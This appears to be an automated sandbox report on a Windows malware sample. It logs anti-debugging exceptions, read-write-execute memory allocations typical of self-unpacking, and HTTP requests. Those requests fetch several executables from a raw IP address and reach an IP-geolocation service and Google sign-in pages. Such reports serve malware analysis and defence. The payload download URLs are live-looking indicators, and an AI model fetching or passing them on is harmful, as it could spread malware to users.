__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: reals+0x173709 @ 0x573709 reals+0x161b32 @ 0x561b32 exception.instruction_r: cc eb 03 8c 9d b0 5e 5b 8b e5 5d c3 eb 02 25 69 exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0x6751a9 registers.esp: 1637892 registers.edi: 32266480 registers.eax: 5629177 registers.ebp: 1637916 registers.edx: 5629176 registers.ebx: 6684732 registers.esi: 6770680 registers.ecx: 10	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: reals+0x173709 @ 0x573709 reals+0x161b32 @ 0x561b32 exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.esp: 1637892 registers.edi: 32266480 registers.eax: 0 registers.ebp: 1637916 registers.edx: 0 registers.ebx: 6684732 registers.esi: 6770680 registers.ecx: 10	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: reals+0x173709 @ 0x573709 reals+0x161b32 @ 0x561b32 exception.instruction_r: 0f 0b 0f 0b eb b7 eb 03 dd ca 17 eb 04 3d 32 08 exception.instruction: ud2 exception.exception_code: 0xc000001d exception.symbol: exception.address: 0x6751d8 registers.esp: 1637892 registers.edi: 32266480 registers.eax: 0 registers.ebp: 1637916 registers.edx: 0 registers.ebx: 6684732 registers.esi: 6770680 registers.ecx: 10	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: reals+0x173709 @ 0x573709 reals+0x161b32 @ 0x561b32 exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.esp: 1637892 registers.edi: 32266480 registers.eax: 0 registers.ebp: 1637916 registers.edx: 0 registers.ebx: 6684732 registers.esi: 6770680 registers.ecx: 10	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: reals+0x173709 @ 0x573709 reals+0x161b32 @ 0x561b32 exception.instruction_r: 0f b7 53 06 eb 01 72 c1 e2 10 eb 04 36 c5 8d f3 exception.instruction: movzx edx, word ptr [ebx + 6] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x67539c registers.esp: 1637888 registers.edi: 6684732 registers.eax: 0 registers.ebp: 1637916 registers.edx: 1637908 registers.ebx: 12144792 registers.esi: 4286372096 registers.ecx: 244	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: 0x67a970 reals+0x161b32 @ 0x561b32 exception.instruction_r: 0f 3f 07 0b c7 45 fc ff ff ff ff 33 c0 33 d2 39 exception.exception_code: 0xc000001d exception.symbol: exception.address: 0x67aae6 registers.esp: 1637880 registers.edi: 32292108 registers.eax: 1 registers.ebp: 1637892 registers.edx: 5629176 registers.ebx: 6684732 registers.esi: 4286372096 registers.ecx: 2020557398	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: reals+0x161b32 @ 0x561b32 exception.instruction_r: 8b 00 90 90 f8 eb 01 8c 73 42 eb 04 30 8d 07 5f exception.instruction: mov eax, dword ptr [eax] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x67a9a0 registers.esp: 1637904 registers.edi: 32292108 registers.eax: 0 registers.ebp: 1638220 registers.edx: 2 registers.ebx: 6684732 registers.esi: 4286372096 registers.ecx: 2130563072	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: reals+0x161b32 @ 0x561b32 exception.instruction_r: 90 f8 eb 01 8c 73 42 eb 04 30 8d 07 5f eb 02 89 exception.instruction: nop exception.exception_code: 0x80000004 exception.symbol: exception.address: 0x67a9a3 registers.esp: 1637904 registers.edi: 32292108 registers.eax: 0 registers.ebp: 1638220 registers.edx: 2 registers.ebx: 6684732 registers.esi: 4286372096 registers.ecx: 2130563072	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: reals+0x161b32 @ 0x561b32 exception.instruction_r: cd 01 40 40 eb 01 71 85 c0 70 d2 74 5b eb 05 dc exception.instruction: int 1 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x67a94d registers.esp: 1637904 registers.edi: 32293296 registers.eax: 0 registers.ebp: 1638220 registers.edx: 6793787 registers.ebx: 6684732 registers.esi: 4286372096 registers.ecx: 5629176	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: reals+0x173709 @ 0x573709 reals+0x161b32 @ 0x561b32 exception.instruction_r: cc eb 03 8c 9d b0 5e 5b 8b e5 5d c3 eb 02 25 69 exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0x67b1a9 registers.esp: 1637892 registers.edi: 32295736 registers.eax: 0 registers.ebp: 1637916 registers.edx: 5629176 registers.ebx: 6684732 registers.esi: 6795256 registers.ecx: 10	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: reals+0x173709 @ 0x573709 reals+0x161b32 @ 0x561b32 exception.instruction_r: f7 f0 eb 02 83 bd eb 01 0b cc eb 03 8c 9d b0 5e exception.instruction: div eax exception.exception_code: 0xc0000094 exception.symbol: exception.address: 0x67b1a0 registers.esp: 1637892 registers.edi: 32295736 registers.eax: 0 registers.ebp: 1637916 registers.edx: 5629176 registers.ebx: 6684732 registers.esi: 6795256 registers.ecx: 10	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: reals+0x173709 @ 0x573709 reals+0x161b32 @ 0x561b32 exception.instruction_r: cc eb 03 8c 9d b0 5e 5b 8b e5 5d c3 eb 02 25 69 exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0x67b1a9 registers.esp: 1637892 registers.edi: 32295736 registers.eax: 0 registers.ebp: 1637916 registers.edx: 5629176 registers.ebx: 6684732 registers.esi: 6795256 registers.ecx: 10	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: reals+0x173709 @ 0x573709 reals+0x161b32 @ 0x561b32 exception.instruction_r: 0f 0b 0f 0b eb b7 eb 03 dd ca 17 eb 04 3d 32 08 exception.instruction: ud2 exception.exception_code: 0xc000001d exception.symbol: exception.address: 0x67b1d8 registers.esp: 1637892 registers.edi: 32295736 registers.eax: 0 registers.ebp: 1637916 registers.edx: 5629176 registers.ebx: 6684732 registers.esi: 6795256 registers.ecx: 10	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: reals+0x173709 @ 0x573709 reals+0x161b32 @ 0x561b32 exception.instruction_r: 8b c2 eb 05 87 a8 95 3f 5d 55 8b 60 83 6c 24 20 exception.instruction: mov eax, edx exception.exception_code: 0x80000004 exception.symbol: exception.address: 0x67b275 registers.esp: 1637892 registers.edi: 32295736 registers.eax: 0 registers.ebp: 1637916 registers.edx: 5629176 registers.ebx: 6684732 registers.esi: 6795256 registers.ecx: 10	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: reals+0x173709 @ 0x573709 reals+0x161b32 @ 0x561b32 exception.instruction_r: 0f 0b 0f 0b eb b7 eb 03 dd ca 17 eb 04 3d 32 08 exception.instruction: ud2 exception.exception_code: 0xc000001d exception.symbol: exception.address: 0x67b1d8 registers.esp: 1637892 registers.edi: 32295736 registers.eax: 0 registers.ebp: 1637916 registers.edx: 5629176 registers.ebx: 6684732 registers.esi: 6795256 registers.ecx: 10	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: reals+0x173709 @ 0x573709 reals+0x161b32 @ 0x561b32 exception.instruction_r: 0f 0b 0f 0b eb b7 eb 03 dd ca 17 eb 04 3d 32 08 exception.instruction: ud2 exception.exception_code: 0xc000001d exception.symbol: exception.address: 0x67b1d8 registers.esp: 1637892 registers.edi: 32295736 registers.eax: 0 registers.ebp: 1637916 registers.edx: 5629176 registers.ebx: 6684732 registers.esi: 6795256 registers.ecx: 10	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: reals+0x173709 @ 0x573709 reals+0x161b32 @ 0x561b32 exception.instruction_r: cc eb 03 8c 9d b0 5e 5b 8b e5 5d c3 eb 02 25 69 exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0x67b1a9 registers.esp: 1637892 registers.edi: 32295736 registers.eax: 0 registers.ebp: 1637916 registers.edx: 5629176 registers.ebx: 6684732 registers.esi: 6795256 registers.ecx: 10	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: reals+0x161b32 @ 0x561b32 exception.instruction_r: cd 68 eb 04 a3 25 c5 ff 66 3d 86 f3 eb 05 1a b3 exception.instruction: int 0x68 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x67b4ee registers.esp: 1637904 registers.edi: 32298584 registers.eax: 17152 registers.ebp: 1638220 registers.edx: 5629176 registers.ebx: 6684732 registers.esi: 4286372096 registers.ecx: 167	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: cc eb 03 e8 fc 05 eb 02 bc 01 eb 03 c6 24 2e 8d exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0x67adf4 registers.esp: 38403916 registers.edi: 1969139966 registers.eax: 0 registers.ebp: 38403976 registers.edx: 6687884 registers.ebx: 6684732 registers.esi: 38403916 registers.ecx: 0	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: 0x67b480 reals+0x161b32 @ 0x561b32 exception.instruction_r: f7 f0 eb 05 db ad a6 42 c5 eb 19 eb 02 ff df eb exception.instruction: div eax exception.exception_code: 0xc0000094 exception.symbol: exception.address: 0x6722ff registers.esp: 1637544 registers.edi: 32304312 registers.eax: 0 registers.ebp: 1637904 registers.edx: 0 registers.ebx: 6684732 registers.esi: 6758993 registers.ecx: 6684732	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: 0x67b576 reals+0x173709 @ 0x573709 reals+0x161b32 @ 0x561b32 exception.instruction_r: f7 f0 eb 02 63 8e eb 07 eb 05 10 05 17 46 a3 eb exception.instruction: div eax exception.exception_code: 0xc0000094 exception.symbol: exception.address: 0x672fa2 registers.esp: 1637524 registers.edi: 6796672 registers.eax: 0 registers.ebp: 1637884 registers.edx: 6762239 registers.ebx: 6684732 registers.esi: 6762239 registers.ecx: 6684732	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: 0x67c7b2 0x67c665 0x67bff7 0x67b663 reals+0x173709 @ 0x573709 reals+0x161b32 @ 0x561b32 exception.instruction_r: f7 f0 eb 05 db ad a6 42 c5 eb 19 eb 02 ff df eb exception.instruction: div eax exception.exception_code: 0xc0000094 exception.symbol: exception.address: 0x6722ff registers.esp: 1637188 registers.edi: 32304748 registers.eax: 0 registers.ebp: 1637548 registers.edx: 1637128 registers.ebx: 6684732 registers.esi: 6758993 registers.ecx: 6684732	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: 0x67c821 0x67c665 0x67bff7 0x67b663 reals+0x173709 @ 0x573709 reals+0x161b32 @ 0x561b32 exception.instruction_r: f7 f0 eb 02 63 8e eb 07 eb 05 10 05 17 46 a3 eb exception.instruction: div eax exception.exception_code: 0xc0000094 exception.symbol: exception.address: 0x672fa2 registers.esp: 1637188 registers.edi: 32304748 registers.eax: 0 registers.ebp: 1637548 registers.edx: 6762239 registers.ebx: 6684732 registers.esi: 6762239 registers.ecx: 6684732	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: 0x67c847 0x67c2a1 0x67c03a 0x67b663 reals+0x173709 @ 0x573709 reals+0x161b32 @ 0x561b32 exception.instruction_r: f7 f0 eb 05 db ad a6 42 c5 eb 19 eb 02 ff df eb exception.instruction: div eax exception.exception_code: 0xc0000094 exception.symbol: exception.address: 0x6722ff registers.esp: 1636884 registers.edi: 1637418 registers.eax: 0 registers.ebp: 1637244 registers.edx: 1637032 registers.ebx: 6684732 registers.esi: 6758993 registers.ecx: 6684732	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: 0x67c956 0x67c2a1 0x67c03a 0x67b663 reals+0x173709 @ 0x573709 reals+0x161b32 @ 0x561b32 exception.instruction_r: f7 f0 eb 02 63 8e eb 07 eb 05 10 05 17 46 a3 eb exception.instruction: div eax exception.exception_code: 0xc0000094 exception.symbol: exception.address: 0x672fa2 registers.esp: 1636884 registers.edi: 1637418 registers.eax: 0 registers.ebp: 1637244 registers.edx: 6762239 registers.ebx: 6684732 registers.esi: 6762239 registers.ecx: 6684732	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: 0x67c847 0x67c205 0x67c09c 0x67b663 reals+0x173709 @ 0x573709 reals+0x161b32 @ 0x561b32 exception.instruction_r: f7 f0 eb 05 db ad a6 42 c5 eb 19 eb 02 ff df eb exception.instruction: div eax exception.exception_code: 0xc0000094 exception.symbol: exception.address: 0x6722ff registers.esp: 1636880 registers.edi: 1637382 registers.eax: 0 registers.ebp: 1637240 registers.edx: 0 registers.ebx: 6684732 registers.esi: 6758993 registers.ecx: 6684732	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: 0x67c956 0x67c205 0x67c09c 0x67b663 reals+0x173709 @ 0x573709 reals+0x161b32 @ 0x561b32 exception.instruction_r: f7 f0 eb 02 63 8e eb 07 eb 05 10 05 17 46 a3 eb exception.instruction: div eax exception.exception_code: 0xc0000094 exception.symbol: exception.address: 0x672fa2 registers.esp: 1636880 registers.edi: 1637382 registers.eax: 0 registers.ebp: 1637240 registers.edx: 6762239 registers.ebx: 6684732 registers.esi: 6762239 registers.ecx: 6684732	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: 0x67cc38 reals+0x161b32 @ 0x561b32 exception.instruction_r: f7 f0 eb 05 db ad a6 42 c5 eb 19 eb 02 ff df eb exception.instruction: div eax exception.exception_code: 0xc0000094 exception.symbol: exception.address: 0x6722ff registers.esp: 1637544 registers.edi: 32310416 registers.eax: 0 registers.ebp: 1637904 registers.edx: 0 registers.ebx: 6684732 registers.esi: 6758993 registers.ecx: 6684732	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: 0x67d994 reals+0x161b32 @ 0x561b32 exception.instruction_r: f7 f0 eb 05 db ad a6 42 c5 eb 19 eb 02 ff df eb exception.instruction: div eax exception.exception_code: 0xc0000094 exception.symbol: exception.address: 0x6722ff registers.esp: 1637532 registers.edi: 32310416 registers.eax: 0 registers.ebp: 1637892 registers.edx: 5714544 registers.ebx: 6684732 registers.esi: 6758993 registers.ecx: 6684732	1
__exception__ Feb. 19, 2024, 7:49 a.m.	stacktrace: 0x67dd45 0x67d2b2 reals+0x161b32 @ 0x561b32 exception.instruction_r: f7 f0 eb 02 63 8e eb 07 eb 05 10 05 17 46 a3 eb exception.instruction: div eax exception.exception_code: 0xc0000094 exception.symbol: exception.address: 0x672fa2 registers.esp: 1637124 registers.edi: 32310416 registers.eax: 0 registers.ebp: 1637484 registers.edx: 6762239 registers.ebx: 6684732 registers.esi: 6762239 registers.ecx: 6684732	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (10 events)

suspicious_features	Connection to IP address	suspicious_request	HEAD http://185.215.113.46/cost/fu.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.215.113.46/cost/fu.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://185.215.113.46/mine/amert.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.215.113.46/mine/amert.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://185.215.113.46/cost/niks.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.215.113.46/cost/niks.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://185.215.113.46/mine/plaza.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.215.113.46/mine/plaza.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://185.215.113.46/cost/ladas.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.215.113.46/cost/ladas.exe

Performs some HTTP requests (21 events)

request	HEAD http://185.215.113.46/cost/fu.exe
request	GET http://185.215.113.46/cost/fu.exe
request	HEAD http://185.215.113.46/mine/amert.exe
request	GET http://185.215.113.46/mine/amert.exe
request	HEAD http://185.215.113.46/cost/niks.exe
request	GET http://185.215.113.46/cost/niks.exe
request	HEAD http://185.215.113.46/mine/plaza.exe
request	GET http://185.215.113.46/mine/plaza.exe
request	HEAD http://185.215.113.46/cost/ladas.exe
request	GET http://185.215.113.46/cost/ladas.exe
request	GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
request	GET https://db-ip.com/demo/home.php?s=175.208.134.152
request	GET https://accounts.google.com/
request	GET https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F
request	GET https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=ATuJsjzgUHm32IHHReMnNubjaHuhhXLWhS_SbL3pzJaoM1SttxKeFUH3DHO_0ehIkDGeccM5wp6izw
request	GET https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=ATuJsjyDRmcM1-iZW3cVP-5MNSZnEdXkJZwAmQw8bVgZ0PLSvIIrqtM1U1kcweY3onol0wRoljOR_w&passive=1209600&flowName=WebLiteSignIn&flowEntry=ServiceLogin&dsh=S-117171857%3A1708296749375638
request	GET https://accounts.google.com/_/bscframe
request	GET https://ssl.gstatic.com/images/branding/googlelogo/2x/googlelogo_color_74x24dp.png
request	GET https://accounts.google.com/favicon.ico
request	GET https://accounts.google.com/generate_204?EE92yg
request	GET https://www.google.com/favicon.ico

Allocates read-write-execute memory (usually to unpack itself) (50 out of 1947 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Feb. 19, 2024, 7:49 a.m.	process_identifier: 2548 region_size: 757760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01e20000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2024, 7:49 a.m.	process_identifier: 2548 region_size: 307200 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00660000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:49 a.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73662000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:49 a.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76faf000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:49 a.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76f20000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:49 a.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1093632 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00401000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:49 a.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1093632 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00401000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:49 a.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 159744 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0050c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:49 a.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 159744 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0050c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:49 a.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 16384 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00533000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:49 a.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 16384 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00533000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:49 a.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0050c000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2024, 7:49 a.m.	process_identifier: 2548 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:50 a.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73662000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2024, 7:50 a.m.	process_identifier: 2936 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aa0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2024, 7:50 a.m.	process_identifier: 2988 region_size: 4067328 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02660000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2024, 7:50 a.m.	process_identifier: 2988 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:50 a.m.	process_identifier: 2988 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758af000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:50 a.m.	process_identifier: 2988 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758af000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:50 a.m.	process_identifier: 2988 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758af000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:50 a.m.	process_identifier: 2988 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758af000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:50 a.m.	process_identifier: 2988 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7587c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:50 a.m.	process_identifier: 2988 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7589c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:50 a.m.	process_identifier: 2988 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7587c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:50 a.m.	process_identifier: 2988 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7589c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:50 a.m.	process_identifier: 2988 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72c03000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:50 a.m.	process_identifier: 2988 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72ca7000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:50 a.m.	process_identifier: 2988 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x757c9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:50 a.m.	process_identifier: 2988 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75522000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:50 a.m.	process_identifier: 2988 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75862000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:50 a.m.	process_identifier: 2988 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758af000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:50 a.m.	process_identifier: 2988 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758af000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:50 a.m.	process_identifier: 2988 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758af000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2024, 7:50 a.m.	process_identifier: 2988 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:50 a.m.	process_identifier: 2988 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73662000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:51 a.m.	process_identifier: 2988 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6f6c1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2024, 7:50 a.m.	process_identifier: 3064 region_size: 3411968 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02e40000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2024, 7:50 a.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03180000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:50 a.m.	process_identifier: 3064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758af000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:50 a.m.	process_identifier: 3064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758af000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2024, 7:50 a.m.	process_identifier: 3064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758af000 process_handle: 0xffffffff	1
